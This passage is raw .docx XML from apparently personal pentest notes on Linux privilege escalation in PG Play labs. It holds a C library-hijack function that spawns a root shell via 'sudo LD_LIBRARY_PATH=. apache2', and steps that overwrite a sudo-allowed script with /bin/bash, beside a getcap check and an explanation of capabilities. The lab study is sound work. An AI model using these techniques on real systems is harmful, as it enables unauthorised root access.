      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022EE">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="720"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">void hijack() {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022EF">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="720"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">unsetenv("LD_LIBRARY_PATH");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022F0">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="720"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">setresuid(0,0,0);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022F1">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="720"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">system("/bin/bash -p");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022F2">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="720"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Compile library_path.c into libcrypt.so.1 (replace it with whatever library you want):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022F5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">gcc -o </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">libcrypt.so.1 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-shared -fPIC library_path.c</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022F6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Run apache2 using sudo, while setting the LD_LIBRARY_PATH environment variable to the current path (where we compiled library_path.c):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022F7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo LD_LIBRARY_PATH=. apache2</w:t>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r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022FA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5167313" cy="3761019"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="175" name="image173.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image173.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId740"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5167313" cy="3761019"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022FB">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_exb2attotbad" w:id="308"/>
      <w:bookmarkEnd w:id="308"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Get root shell if a file from sudo -l doesn't exist or you can overwrite it</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022FC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId742">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Pwned1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play, we saw that we can run </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/opt/tools/server-health.sh</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> as root. But, after trying to inspect the file, we realize it doesn't exist. And when we tried creating the file within </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/opt/tools</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we saw that we could. So, we can put any code inside of a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">server-health.sh </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">file that opens a Bash shell, run </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/opt/tools/server-health.sh </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">as sudo, and then get a root shell!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022FD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022FE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here's what they did:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022FF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1061"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cd /opt/tool</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002300">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1061"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">touch server-health.sh</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and then copy and paste </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002301">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1061"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Or alternatively:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002302">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1061"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">echo /bin/bash &gt; server-health.sh</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002303">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1061"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">chmod 777 server-health.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002304">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1061"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo /opt/tools/server-health.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002305">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1241"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This should give us root</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002306">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002307">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002308">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>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rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023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0C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000230D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_5fq1sasegyzb" w:id="309"/>
      <w:bookmarkEnd w:id="309"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Capabilities</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000230E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000230F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Use GTFOBins for Capabilities! They have a section on here</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002310">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002311">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002312">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We learned about Capabilities in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId743">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Empire-breakout</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002313">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_et9nzx9a1q5g" w:id="310"/>
      <w:bookmarkEnd w:id="310"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002314">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to check:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002315">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="194"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/sbin/getcap -r / 2&gt;/dev/null</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002316">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002317">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_8d3u81t5hw7" w:id="311"/>
      <w:bookmarkEnd w:id="311"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Capabilities explanation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002318">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002319">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">TLDR: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Linux capabilities help a service do only what it needs as "root" (without all the privileges that come with full root access), rather than allowing it to run with unrestricted root power.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000231A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000231B">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Linux capabilities</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> are a security feature that breaks up the all-powerful root privileges into smaller, more focused privileges. Instead of a process needing full root access (UID 0) to perform any privileged action, it can be granted only the specific </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">capability</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> it needs. This allows for more fine-grained control over what a program can do—making systems more secure and reducing the damage potential of a compromised binary.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000231C">
      <w:pPr>
        <w:spacing w:before="280" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Example: Why this matters</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000231D">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Let's say a binary only needs to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">read arbitrary files</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (like </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
